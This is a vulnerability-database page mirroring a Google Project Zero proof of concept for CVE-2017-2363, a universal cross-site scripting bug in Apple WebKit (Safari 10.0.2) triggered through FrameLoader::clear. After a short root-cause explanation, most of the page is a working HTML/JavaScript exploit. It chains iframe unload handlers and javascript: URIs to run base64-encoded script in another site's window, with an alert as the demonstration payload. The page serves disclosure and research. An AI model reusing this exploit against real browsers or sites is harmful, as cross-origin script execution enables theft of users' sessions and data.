Lucene search

K

Apple WebKit 10.0.2 - FrameLoader::clear Universal Cross-Site Scripting Exploit

🗓️ 24 Feb 2017 00:00:00Reported by Google Security ResearchType 
zdt
 zdt
🔗 0day.today👁 27 Views

Apple WebKit 10.0.2 - FrameLoader::clear Universal Cross-Site Scripting Exploi

Show more
Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2017-2363
20 Feb 201708:59
cve
seebug.org
Apple WebKit: UXSS via FrameLoader::clear (CVE-2017-2363)
23 Feb 201700:00
seebug
Prion
Design/Logic Flaw
20 Feb 201708:59
prion
Exploit DB
Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting
24 Feb 201700:00
exploitdb
AlpineLinux
CVE-2017-2363
20 Feb 201708:59
alpinelinux
Debian CVE
CVE-2017-2363
20 Feb 201708:59
debiancve
UbuntuCve
CVE-2017-2363
16 Feb 201700:00
ubuntucve
NVD
CVE-2017-2363
20 Feb 201708:59
nvd
Cvelist
CVE-2017-2363
20 Feb 201708:35
cvelist
Tenable Nessus
Ubuntu 16.04 LTS : WebKitGTK+ vulnerabilities (USN-3200-1)
17 Feb 201700:00
nessus
Rows per page
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1049
 
When the new page is loading, FrameLoader::clear is called to clear the old document and window.
 
Here's a snippet of FrameLoader::clear.
 
void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
    ...
    // Do this after detaching the document so that the unload event works.
    if (clearWindowProperties) {
        InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
        m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
        m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)
 
        if (shouldClearWindowName(m_frame, *newDocument))
            m_frame.tree().setName(nullAtom);
    }
 
    ...
    m_frame.setDocument(nullptr); <<-------- (2)
    ...
}
 
The new document's window is attached at (1) before calling |m_frame.setDocument(nullptr)| that calls unload event handlers. So in the unload event handler, we could execute arbitrary javascript code on new document's window with a javascript: URI.
 
 
Tested on Safari 10.0.2(12602.3.12.0.1).
-->
 
<body>
<script>
 
/*
 
Apple WebKit: UXSS via FrameLoader::clear
 
When the new page is loading, FrameLoader::clear is called to clear the old document and window.
 
Here's a snippet of FrameLoader::clear.
 
void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
    ...
    // Do this after detaching the document so that the unload event works.
    if (clearWindowProperties) {
        InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
        m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
        m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)
 
        if (shouldClearWindowName(m_frame, *newDocument))
            m_frame.tree().setName(nullAtom);
    }
 
    ...
    m_frame.setDocument(nullptr); <<-------- (2)
    ...
}
 
The new document's window is attached at (1) before calling |m_frame.setDocument(nullptr)| that calls unload event handlers. So in the unload event handler, we could execute arbitrary javascript code on new document's window with a javascript: URI.
 
 
Tested on Safari 10.0.2(12602.3.12.0.1).
*/
 
"use strict";
 
function log(txt) {
    //if (Array.isArray(txt))
    //    txt = Array.prototype.join.call(txt, ", ");
 
    let c = document.createElement("div");
    c.innerText = "log: " + txt;
    d.appendChild(c);
}
 
function main() {
    let f = document.body.appendChild(document.createElement("iframe"));
     
    let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
    a.contentWindow.onunload = () => {
        let b = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
        b.contentWindow.onunload = () => {
            f.src = "javascript:''";
 
            let c = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
            c.contentWindow.onunload = () => {
                f.src = "javascript:''";
 
                let d = f.contentDocument.appendChild(document.createElement("iframe"));
                d.contentWindow.onunload = () => {
                    f.src = "javascript:setTimeout(eval(atob('" + btoa("(" +function () {
                        alert(document.location);
                    } + ")") + "')), 0);";
                };
            };
        };
    };
 
    f.src = "https://abc.xyz/";
}
 
main();
 
/*
b JSC::globalFuncParseFloat
 
*/
</script>
</body>

#  0day.today [2018-02-20]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
24 Feb 2017 00:00Current
7.7High risk
Vulners AI Score7.7
EPSS0.009
27
.json
Report